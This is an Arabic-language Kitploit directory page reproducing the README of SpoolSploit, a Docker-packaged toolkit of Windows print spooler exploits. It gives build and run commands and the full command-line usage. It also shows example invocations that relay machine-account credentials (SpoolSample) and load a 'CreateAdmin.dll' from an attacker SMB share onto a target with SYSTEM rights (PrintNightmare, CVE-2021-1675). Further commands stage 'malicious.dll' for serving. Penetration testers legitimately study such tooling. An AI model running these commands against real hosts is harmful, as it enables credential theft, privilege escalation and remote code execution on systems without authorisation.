Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SpoolSploit — مجموعة من ثغرات طابعة Windows المستغلة معبأة في حاويات مع أدوات أخرى للاستغلال العملي. | Kitploit
أدوات/GitHubGitHub/beetlechunks/spoolsploit
تصعيد الامتيازاتماسحات الثغرات الأمنيةأمن الحاوياتأطر الاستغلالالاستغلالالحركة الجانبيةاختبار الاختراق
GitHubbeetlechunks/spoolsploit

SpoolSploit

مجموعة من ثغرات طابعة Windows المستغلة معبأة في حاويات مع أدوات أخرى للاستغلال العملي.

عرض المستودع
55291منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SpoolSploit

مجموعة من استغلالات مدير الطباعة في Windows معبأة في حاويات مع أدوات أخرى للاستغلال العملي.

ملخص

SpoolSploit هي مجموعة من استغلالات مدير الطباعة في Windows معبأة في حاويات مع أدوات أخرى للاستغلال العملي. بعض الطرق الفعالة للغاية تتمثل في إعادة توجيه بيانات اعتماد حساب الجهاز لرفع الامتيازات وتنفيذ DLLs ضارة على نقاط النهاية بصلاحية الوصول الكامل للنظام.

img

البدء

اعتبارًا من تاريخ الإصدار، تم اختبار حاوية Docker الخاصة بـ SpoolSploit بنجاح على أحدث إصدارات MacOS وUbuntu Linux وWindows 10.

على الرغم من أنه ليس مطلوبًا، إلا أنه إذا كنت ترغب في استضافة DLLs ضارة أو إجراء هجمات إعادة توجيه بيانات الاعتماد، كل ذلك داخل حاوية SpoolSploit، فيجب عليك التأكد من أن المنفذ 445 غير مستخدم على المضيف الذي يعمل عليه Docker. هذا الأمر أكثر شيوعًا عند تشغيل هذه الحاوية على مضيف Windows، حيث إنه يستخدم المنفذ 445 افتراضيًا. إذا كان تعطيل المنفذ 445 على مضيفك غير عملي، فلا بأس! يمكنك ببساطة تشغيل حاوية docker في جهاز افتراضي تم تكوين محول الشبكة فيه بوضع الجسر. سيسمح هذا بتقديم DLLs ضارة وإعادة توجيه بيانات الاعتماد. إذا كنت ترغب فقط في تقديم DLLs ضارة، يمكنك ببساطة استضافة DLLs على مشاركة وصول مجهولة على نظام التشغيل المضيف الخاص بك أو على مشاركة خادم مخترق.

إنشاء حاوية SpoolSploit Docker والوصول إليها

  1. استنساخ هذا المستودع
root@kitploit:~
git clone https://github.com/BeetleChunks/SpoolSploit
  1. بناء صورة حاوية SpoolSploit Docker
root@kitploit:~
cd SpoolSploit
sudo docker build -t spoolsploit .
  1. إنشاء وبدء تشغيل حاوية SpoolSploit Docker
root@kitploit:~
sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
  1. الاتصال بالحاوية
root@kitploit:~
sudo docker exec -it spoolsploit /bin/bash

استخدام سطر الأوامر

root@kitploit:~
usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD

optional arguments:
  -h, --help            show this help message and exit
  -a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
                        Attack type to execute on target(s).
  -rH RHOST, --rhost RHOST
                        Remote target IP, CIDR range, or filename (file:<path>)
  -rP {139,445}, --rport {139,445}
                        Remote SMB server port.
  -lH LHOST, --lhost LHOST
                        Listening hostname or IP
  -lS LSHARE, --lshare LSHARE
                        Staging SMB share (UNC)
  -d DOMAIN, --domain DOMAIN
                        Domain for authentication
  -u USER, --username USER
                        Username for authentication
  -p PASSWD, --password PASSWD
                        Password for authentication

Example - spoolsample:
  python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

Example - nightmare:
  python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

SpoolSample - التقاط وإعادة توجيه بيانات اعتماد حساب جهاز Windows

تحتوي حاوية SpoolSploit Docker على Responder لإعادة توجيه تجزئات حساب الجهاز التي تم الحصول عليها من تنفيذ هجوم spoolsample في SpoolSploit. نظرًا لوجود عدة مقالات رائعة تفصل عملية إعادة توجيه بيانات اعتماد حساب الجهاز المميزة لرفع الامتيازات، لن أدخل في تلك التفاصيل هنا.

PrintNightmare (CVE-2021-1675) - تنفيذ DLLs ضارة على أهداف Windows بصلاحية SYSTEM

مضمن في حاوية SpoolSploit خادم SMB تم تنفيذه عبر Impacket. يمكن استخدام هذا الخادم لاستضافة DLLs ضارة عند تنفيذ هجوم printnightmare في SpoolSploit. تعمل إعدادات خادم SMB الافتراضية، ولكن إذا كنت ترغب في تخصيصها، يمكنك تعديل ملف التكوين الموجود في /home/dlogmas/smbserver/smb-v1.conf.

الشيء الوحيد الذي عليك فعله هو نسخ ملف DLL الخاص بك إلى مجلد المشاركة الخاص بخادم SMB في حاوية SpoolSploit. مسار المشاركة في الحاوية هو /home/dlogmas/smbserver/share/. توضح الأوامر التالية كيفية تحميل ملف DLL إلى حاوية SpoolSploit وجعله متاحًا لخادم SMB.

root@kitploit:~
sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/
sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'

إخلاء مسؤولية

تم إنشاء هذا الكود البرهاني للأغراض البحثية الأكاديمية وليس المقصود استخدامه ضد الأنظمة إلا في حالة التصريح بذلك صراحة. يتم توفير الكود كما هو دون أي ضمانات أو وعود بشأن تنفيذه. أنا لست مسؤولاً أو ملزماً عن سوء استخدام هذا الكود.

الاعتمادات

SpoolSample - ميزة Microsoft

  • leechristensen اكتشف استغلال SpoolSample وأنشأ POC بلغة C# SpoolSample
  • 3xocyte أنشأ POC لـ SpoolSample بلغة Python2 dementor.

PrintNightmare - CVE-2021-1675 / CVE-2021-34527

  • cube0x0 أنشأ استغلال PrintNightmare بلغة Python بعد تنفيذ بروتوكولات MS-PAR وMS-RPRN واستدعاءات API في Impacket.
  • Zhiniang Peng وXuefeng Li اكتشفا هذا الاستغلال.
تنزيل الأداة